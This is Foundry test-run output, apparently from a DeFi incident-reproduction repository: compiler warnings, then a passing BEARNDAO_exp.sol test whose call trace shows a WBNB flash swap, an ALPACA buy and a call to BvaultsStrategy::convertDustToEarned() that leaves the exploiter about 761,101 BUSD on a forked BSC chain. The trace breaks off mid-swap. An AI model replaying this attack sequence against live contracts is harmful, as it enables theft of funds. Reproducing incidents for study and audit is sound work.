Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.28s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2023-12/BEARNDAO_exp.sol:21:5:
   |
21 |     IERC20 private constant WBNB = IERC20(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:2436:1:
     |
2436 | interface WBNB {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-12/BEARNDAO_exp.sol:54:26:
   |
54 |     function pancakeCall(address _sender, uint256 _amount0, uint256 _amount1, bytes calldata _data) external {
   |                          ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-12/BEARNDAO_exp.sol:54:43:
   |
54 |     function pancakeCall(address _sender, uint256 _amount0, uint256 _amount1, bytes calldata _data) external {
   |                                           ^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-12/BEARNDAO_exp.sol:54:61:
   |
54 |     function pancakeCall(address _sender, uint256 _amount0, uint256 _amount1, bytes calldata _data) external {
   |                                                             ^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-12/BEARNDAO_exp.sol:54:79:
   |
54 |     function pancakeCall(address _sender, uint256 _amount0, uint256 _amount1, bytes calldata _data) external {
   |                                                                               ^^^^^^^^^^^^^^^^^^^^

Warning (2018): Function state mutability can be restricted to view
  --> src/test/2023-12/BEARNDAO_exp.sol:96:5:
   |
96 |     function getAmount() internal returns (uint256) {
   |     ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 524.90ms (1.84ms CPU time)

Ran 1 test for src/test/2023-12/BEARNDAO_exp.sol:ContractTest
[PASS] testExploit() (gas: 922668)
Logs:
  Exploiter amount of BUSD before attack: 0.000000000000000000
  Exploiter amount of BUSD after attack: 761101.179715950511062981

Traces:
  [7990] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 34099688 [3.409e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(WBNB: [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], "WBNB")
    │   └─ ← [Return]
    ├─ [0] VM::label(ALPACA: [0x8F0528cE5eF7B51152A59745bEfDD91D97091d2F], "ALPACA")
    │   └─ ← [Return]
    ├─ [0] VM::label(BUSD: [0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56], "BUSD")
    │   └─ ← [Return]
    ├─ [0] VM::label(CAKE_WBNB: [0x0eD7e52944161450477ee417DE9Cd3a859b14fD0], "CAKE_WBNB")
    │   └─ ← [Return]
    ├─ [0] VM::label(Router: [0x05fF2B0DB69458A0750badebc4f9e13aDd608C7F], "Router")
    │   └─ ← [Return]
    ├─ [0] VM::label(BvaultsStrategy: [0x21125d94Cfe886e7179c8D2fE8c1EA8D57C73E0e], "BvaultsStrategy")
    │   └─ ← [Return]
    └─ ← [Stop]

  [1158600] ContractTest::testExploit()
    ├─ [2534] WBNB::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::record()
    │   └─ ← [Return]
    ├─ [534] WBNB::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::accesses(WBNB: [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c])
    │   └─ ← [Return] [0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c], []
    ├─ [0] VM::load(WBNB: [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ emit WARNING_UninitedSlot(who: WBNB: [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], slot: 13407199363679635973052879518465057167389910613330280238043615909335847287356 [1.34e76])
    ├─ [0] VM::load(WBNB: [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [534] WBNB::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::store(WBNB: [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c, 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff)
    │   └─ ← [Return]
    ├─ [534] WBNB::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]
    ├─ [0] VM::store(WBNB: [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ emit SlotFound(who: WBNB: [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], fsig: 0x70a08231, keysHash: 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03, slot: 13407199363679635973052879518465057167389910613330280238043615909335847287356 [1.34e76])
    ├─ [0] VM::load(WBNB: [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [0] VM::store(WBNB: [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ [534] WBNB::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [2531] BUSD::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::record()
    │   └─ ← [Return]
    ├─ [531] BUSD::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::accesses(BUSD: [0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56])
    │   └─ ← [Return] [0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96], []
    ├─ [0] VM::load(BUSD: [0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ emit WARNING_UninitedSlot(who: BUSD: [0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56], slot: 81201235000773904770131445719184449197250777359516868712991521815545917127830 [8.12e76])
    ├─ [0] VM::load(BUSD: [0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [531] BUSD::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::store(BUSD: [0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff)
    │   └─ ← [Return]
    ├─ [531] BUSD::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]
    ├─ [0] VM::store(BUSD: [0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ emit SlotFound(who: BUSD: [0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56], fsig: 0x70a08231, keysHash: 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03, slot: 81201235000773904770131445719184449197250777359516868712991521815545917127830 [8.12e76])
    ├─ [0] VM::load(BUSD: [0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [0] VM::store(BUSD: [0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ [531] BUSD::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [531] BUSD::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [2425] BUSD::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Exploiter amount of BUSD before attack", val: 0, decimals: 18)
    ├─ [617117] CAKE_WBNB::swap(0, 10000000000000000000000 [1e22], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   ├─ [27962] WBNB::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 10000000000000000000000 [1e22])
    │   │   ├─ emit Transfer(from: CAKE_WBNB: [0x0eD7e52944161450477ee417DE9Cd3a859b14fD0], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 10000000000000000000000 [1e22])
    │   │   ├─  storage changes:
    │   │   │   @ 0x774456c48aa6871068b68c947f132b492bb302d48e494377f521bc0164db1c16: 0x00000000000000000000000000000000000000000000136bd24cae2f6f63d976 → 0x00000000000000000000000000000000000000000000114db86be474bd23d976
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x00000000000000000000000000000000000000000000021e19e0c9bab2400000
    │   │   └─ ← [Return] true
    │   ├─ [547710] ContractTest::pancakeCall(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 10000000000000000000000 [1e22], 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   │   ├─ [24420] WBNB::approve(Router: [0x05fF2B0DB69458A0750badebc4f9e13aDd608C7F], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: Router: [0x05fF2B0DB69458A0750badebc4f9e13aDd608C7F], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x9e92c554e0e04b2ef82e8e23fe7dc63104898ac828724bac11fe5f8760f9ef39: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   └─ ← [Return] true
    │   │   ├─ [24517] ALPACA::approve(Router: [0x05fF2B0DB69458A0750badebc4f9e13aDd608C7F], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: Router: [0x05fF2B0DB69458A0750badebc4f9e13aDd608C7F], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x239c5bca1dc92bde21fdc9e084b86c229b01ef244095d92687dcc171a40c255f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   └─ ← [Return] true
    │   │   ├─ [534] WBNB::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 10000000000000000000000 [1e22]
    │   │   ├─ [86781] Router::swapExactTokensForTokensSupportingFeeOnTransferTokens(10000000000000000000000 [1e22], 0, [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0x8F0528cE5eF7B51152A59745bEfDD91D97091d2F], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1701813180 [1.701e9])
    │   │   │   ├─ [8225] WBNB::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xF3CE6Aac24980E6B657926dfC79502Ae414d3083, 10000000000000000000000 [1e22])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xF3CE6Aac24980E6B657926dfC79502Ae414d3083, value: 10000000000000000000000 [1e22])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xb50cc8215a1f75f3f96d8db27d864bc4a04454f3b4a7d8c8e269534729037283: 0x000000000000000000000000000000000000000000000009fd35f92572c17d20 → 0x0000000000000000000000000000000000000000000002281716c2e025017d20
    │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000021e19e0c9bab2400000 → 0
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [2797] ALPACA::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [2494] 0xF3CE6Aac24980E6B657926dfC79502Ae414d3083::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 224654220879620693092492 [2.246e23], 184266460067981786400 [1.842e20], 1701811680 [1.701e9]
    │   │   │   ├─ [534] WBNB::balanceOf(0xF3CE6Aac24980E6B657926dfC79502Ae414d3083) [staticcall]
    │   │   │   │   └─ ← [Return] 10184266460067981786400 [1.018e22]
    │   │   │   ├─ [61753] 0xF3CE6Aac24980E6B657926dfC79502Ae414d3083::swap(220581498250452103236696 [2.205e23], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [28641] ALPACA::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 220581498250452103236696 [2.205e23])
    │   │   │   │   │   ├─ emit Transfer(from: 0xF3CE6Aac24980E6B657926dfC79502Ae414d3083, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 220581498250452103236696 [2.205e23])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x000000000000000000000000000000000000000000002eb5bf3a1febae3e8c58
    │   │   │   │   │   │   @ 0x814fe2fe38ac15255003b27cb20583bb0f9ed8e852e552e2eede51991a545127: 0x000000000000000000000000000000000000000000002f92879b84f0af00e88c → 0x0000000000000000000000000000000000000000000000dcc861650500c25c34
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [797] ALPACA::balanceOf(0xF3CE6Aac24980E6B657926dfC79502Ae414d3083) [staticcall]
    │   │   │   │   │   └─ ← [Return] 4072722629168589855796 [4.072e21]
    │   │   │   │   ├─ [534] WBNB::balanceOf(0xF3CE6Aac24980E6B657926dfC79502Ae414d3083) [staticcall]
    │   │   │   │   │   └─ ← [Return] 10184266460067981786400 [1.018e22]
    │   │   │   │   ├─ emit Sync(reserve0: 4072722629168589855796 [4.072e21], reserve1: 10184266460067981786400 [1.018e22])
    │   │   │   │   ├─ emit Swap(sender: Router: [0x05fF2B0DB69458A0750badebc4f9e13aDd608C7F], amount0In: 0, amount1In: 10000000000000000000000 [1e22], amount0Out: 220581498250452103236696 [2.205e23], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 9: 0x00000000000000000000000000000001f69d12a5f1f6494ba15cd1a51cc14e9a → 0x00000000000000000000000000000001f69e4d9d1a8979a3359ef1533a4cd252
    │   │   │   │   │   @ 10: 0x0000000000000000000000000013dc8c2dd900bee010cb0ffcbbdc59b2574349 → 0x0000000000000000000000000013dca8157cf0eb34849c5f89c57f8b4453c63d
    │   │   │   │   │   @ 8: 0x656f95e0000000000009fd35f92572c17d20000000002f92879b84f0af00e88c → 0x656f9bbc0000000002281716c2e025017d200000000000dcc861650500c25c34
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [797] ALPACA::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 220581498250452103236696 [2.205e23]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [164903] BvaultsStrategy::convertDustToEarned()
    │   │   │   ├─ [2531] BUSD::balanceOf(BvaultsStrategy: [0x21125d94Cfe886e7179c8D2fE8c1EA8D57C73E0e]) [staticcall]
    │   │   │   │   └─ ← [Return] 768358953227757555088466 [7.683e23]
    │   │   │   ├─ [2638] BUSD::allowance(BvaultsStrategy: [0x21125d94Cfe886e7179c8D2fE8c1EA8D57C73E0e], Router: [0x05fF2B0DB69458A0750badebc4f9e13aDd608C7F]) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [22462] BUSD::approve(Router: [0x05fF2B0DB69458A0750badebc4f9e13aDd608C7F], 768358953227757555088466 [7.683e23])
    │   │   │   │   ├─ emit Approval(owner: BvaultsStrategy: [0x21125d94Cfe886e7179c8D2fE8c1EA8D57C73E0e], spender: Router: [0x05fF2B0DB69458A0750badebc4f9e13aDd608C7F], value: 768358953227757555088466 [7.683e23])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xf10447237ecc206997c8e196fc689d4ab47b02e228fb6a726c59db2f468ddaf4: 0 → 0x00000000000000000000000000000000000000000000a2b4d2835c704cf4fc52
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [114410] Router::swapExactTokensForTokensSupportingFeeOnTransferTokens(768358953227757555088466 [7.683e23], 0, [0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0x8F0528cE5eF7B51152A59745bEfDD91D97091d2F], BvaultsStrategy: [0x21125d94Cfe886e7179c8D2fE8c1EA8D57C73E0e], 1701813240 [1.701e9])
    │   │   │   │   ├─ [13634] BUSD::transferFrom(BvaultsStrategy: [0x21125d94Cfe886e7179c8D2fE8c1EA8D57C73E0e], 0x1B96B92314C44b159149f7E0303511fB2Fc4774f, 768358953227757555088466 [7.683e23])
    │   │   │   │   │   ├─ emit Transfer(from: BvaultsStrategy: [0x21125d94Cfe886e7179c8D2fE8c1EA8D57C73E0e], to: 0x1B96B92314C44b159149f7E0303511fB2Fc4774f, value: 768358953227757555088466 [7.683e23])
    │   │   │   │   │   ├─ emit Approval(owner: BvaultsStrategy: [0x21125d94Cfe886e7179c8D2fE8c1EA8D57C73E0e], spender: Router: [0x05fF2B0DB69458A0750badebc4f9e13aDd608C7F], value: 0)
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x05af38a207bc2f56cfdd116ba8e0fa20a9308ec494264e3b4aebb4f9e707881c: 0x00000000000000000000000000000000000000000000a2b4d2835c704cf4fc52 → 0
    │   │   │   │   │   │   @ 0x8ee87189e2baecbd44653ddbc4ee9990ab05c6b0175205014f8acd3e7f74ee56: 0x0000000000000000000000000000000000000000000081331b498295afdfa5d9 → 0x0000000000000000000000000000000000000000000123e7edccdf05fcd4a22b
    │   │   │   │   │   │   @ 0xf10447237ecc206997c8e196fc689d4ab47b02e228fb6a726c59db2f468ddaf4: 0x00000000000000000000000000000000000000000000a2b4d2835c704cf4fc52 → 0
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [2797] ALPACA::balanceOf(BvaultsStrategy: [0x21125d94Cfe886e7179c8D2fE8c1EA8D57C73E0e]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [2494] 0x1B96B92314C44b159149f7E0303511fB2Fc4774f::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 2642781658927912124816 [2.642e21], 610128026484235156039129 [6.101e23], 1701813141 [1.701e9]
    │   │   │   │   ├─ [531] BUSD::balanceOf(0x1B96B92314C44b159149f7E0303511fB2Fc4774f) [staticcall]
    │   │   │   │   │   └─ ← [Return] 1378486979711992711127595 [1.378e24]
    │   │   │   │   ├─ [40908] 0x1B96B92314C44b159149f7E0303511fB2Fc4774f::swap(1471762485093628950058 [1.471e21], 0, 0xF3CE6Aac24980E6B657926dfC79502Ae414d3083, 0x)
    │   │   │   │   │   ├─ [8062] WBNB::transfer(0xF3CE6Aac24980E6B657926dfC79502Ae414d3083, 1471762485093628950058 [1.471e21])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x1B96B92314C44b159149f7E0303511fB2Fc4774f, to: 0xF3CE6Aac24980E6B657926dfC79502Ae414d3083, value: 1471762485093628950058 [1.471e21])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x1706dae16412950c0171f9482883b4cf3cb1385468d3a4a4c0fdeceb42541dba: 0x00000000000000000000000000000000000000000000008f43f68cbcd3bf0190 → 0x00000000000000000000000000000000000000000000003f7b27d646dbda4b66
    │   │   │   │   │   │   │   @ 0xb50cc8215a1f75f3f96d8db27d864bc4a04454f3b4a7d8c8e269534729037283: 0x0000000000000000000000000000000000000000000002281716c2e025017d20 → 0x000000000000000000000000000000000000000000000277dfe579561ce6334a
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [534] WBNB::balanceOf(0x1B96B92314C44b159149f7E0303511fB2Fc4774f) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 1171019173834283174758 [1.171e21]
    │   │   │   │   │   ├─ [531] BUSD::balanceOf(0x1B96B92314C44b159149f7E0303511fB2Fc4774f) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 1378486979711992711127595 [1.378e24]
    │   │   │   │   │   ├─ emit Sync(reserve0: 1171019173834283174758 [1.171e21], reserve1: 1378486979711992711127595 [1.378e24])
    │   │   │   │   │   ├─ emit Swap(sender: Router: [0x05fF2B0DB69458A0750badebc4f9e13aDd608C7F], amount0In: 0, amount1In: 768358953227757555088466 [7.683e23], amount0Out: 1471762485093628950058 [1.471e21], amount1Out: 0, to: 0xF3CE6Aac24980E6B657926dfC79502Ae414d3083)
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 8: 0x656f9b950000000081331b498295afdfa5d900000000008f43f68cbcd3bf0190 → 0x656f9bbc0000000123e7edccdf05fcd4a22b00000000003f7b27d646dbda4b66
    │   │   │   │   │   │   @ 10: 0x0000000000000000000000000000000a56eeb4cedc7324a5232383bc87326294 → 0x0000000000000000000000000000000a56eee00dcf5f46916f59c974686b6f65
    │   │   │   │   │   │   @ 9: 0x00000000000000000000000000070978fa9f9cad794ea94f48c0ea8c5f000460 → 0x000000000000000000000000000709791dcb614ba1eb30a6eb6110156181e65b
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [494] 0xF3CE6Aac24980E6B657926dfC79502Ae414d3083::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 4072722629168589855796 [4.072e21], 10184266460067981786400 [1.018e22], 1701813180 [1.701e9]
    │   │   │   │   ├─ [534] WBNB::balanceOf(0xF3CE6Aac24980E6B657926dfC79502Ae414d3083) [staticcall]
    │   │   │   │   │   └─ ← [Return] 11656028945161610736458 [1.165e22]
    │   │   │   │   ├─ [37581] 0xF3CE6Aac24980E6B657926dfC79502Ae414d3083::swap(513348353791467415682 [5.133e20], 0, BvaultsStrategy: [0x21125d94Cfe886e7179c8D2fE8c1EA8D57C73E0e], 0x)
    │   │   │   │   │   ├─ [23841] ALPACA::transfer(BvaultsStrategy: [0x21125d94Cfe886e7179c8D2fE8c1EA8D57C73E0e], 513348353791467415682 [5.133e20])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0xF3CE6Aac24980E6B657926dfC79502Ae414d3083, to: BvaultsStrategy: [0x21125d94Cfe886e7179c8D2fE8c1EA8D57C73E0e], value: 513348353791467415682 [5.133e20])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x814fe2fe38ac15255003b27cb20583bb0f9ed8e852e552e2eede51991a545127: 0x0000000000000000000000000000000000000000000000dcc861650500c25c34 → 0x0000000000000000000000000000000000000000000000c0f43dad1514caf3b2
    │   │   │   │   │   │   │   @ 0xb46ab7b3342b95ff130aaace5f7f1b3da8c91b426aaae34c68bdfd288e0ac08c: 0 → 0x00000000000000000000000000000000000000000000001bd423b7efebf76882
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [797] ALPACA::balanceOf(0xF3CE6Aac24980E6B657926dfC79502Ae414d3083) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 3559374275377122440114 [3.559e21]
    │   │   │   │   │   ├─ [534] WBNB::balanceOf(0xF3CE6Aac24980E6B657926dfC79502Ae414d3083) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 11656028945161610736458 [1.165e22]
    │   │   │   │   │   ├─ emit Sync(reserve0: 3559374275377122440114 [3.559e21], reserve1: 11656028945161610736458 [1.165e22])
    │   │   │   │   │   ├─ emit Swap(sender: Router: [0x05fF2B0DB69458A0750badebc4f9e13aDd608C7F], amount0In: 0, amount1In: 1471762485093628950058 [1.471e21], amount0Out: 513348353791467415682 [5.133e20], amount1Out: 0, to: BvaultsStrategy: [0x21125d94Cfe886e7179c8D2fE8c1EA8D57C73E0e])
    │   │   │   │   │   ├─  storage changes:
